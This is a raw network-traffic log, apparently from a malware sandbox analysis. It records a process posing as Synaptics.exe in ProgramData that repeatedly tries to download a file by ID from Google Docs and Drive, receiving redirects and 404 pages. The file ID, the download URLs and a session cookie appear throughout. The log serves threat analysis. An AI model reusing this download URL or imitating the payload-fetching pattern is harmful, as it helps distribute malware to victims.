                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:30 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                    2024-12-30 10:25:30 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 32 4b 75 55 55 73 4d 45 30 69 73 30 5a 48 59 58 55 74 61 6c 4f 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="2KuUUsME0is0ZHYXUtalOg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                    2024-12-30 10:25:30 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    21192.168.2.949753142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:31 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:31 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC6piQqX4YpAYSnGK5rmpf9m-AiYJzujFWjmJ5R0iXX-Iqrg4Gdojq1JH_FCsWMVcsIzGlPYdCg
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:31 GMT
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-e1U2MPuRcfP1zzin763k-g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:31 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                    2024-12-30 10:25:31 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 78 66 52 66 4e 61 71 64 31 34 68 4c 31 36 33 76 33 39 62 71 34 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="xfRfNaqd14hL163v39bq4Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                    2024-12-30 10:25:31 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    22192.168.2.949752142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:31 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-12-30 10:25:31 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:31 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-1wAsh459IkKEjMVq73J_Ew' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    23192.168.2.949754142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:31 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-12-30 10:25:31 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:31 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-o0vLVM6S6m-RpUbQKlWz6g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    24192.168.2.949755142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:32 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:32 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC5e2vE356ToewocaN3t2l_I36XsW71uHFHmBre1Hzxf4yI-4zSDBaQAhgIVPx7bU1T6
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:32 GMT
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-Hg8rX6lgkU-loeZeSn9YQQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:32 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2024-12-30 10:25:32 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 70 79 39 47 51 6a 71 4c 6f 70 68 76 4a 71 56 4c 44 5a 4b 69 5f 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="py9GQjqLophvJqVLDZKi_w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2024-12-30 10:25:32 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    25192.168.2.949757142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:32 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    26192.168.2.949758142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:32 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    27192.168.2.949759142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:32 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    28192.168.2.949761142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:33 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:33 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC7O_8nEjWJNdlLNBRnMeU0HqhuwwvBAPvnwCzWY937eobRlfBbBXOk1Adou5ymE5mXY
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:33 GMT
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-e4Pt5PPV8v-pX8X7T0NJBg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:33 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2024-12-30 10:25:33 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 53 46 36 43 62 58 66 65 66 73 77 63 4b 34 32 74 76 4a 76 46 78 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="SF6CbXfefswcK42tvJvFxw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2024-12-30 10:25:33 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    29192.168.2.949762142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:33 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-12-30 10:25:33 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:33 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-zFXmvv2q1-wdjcQKxTqjrA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
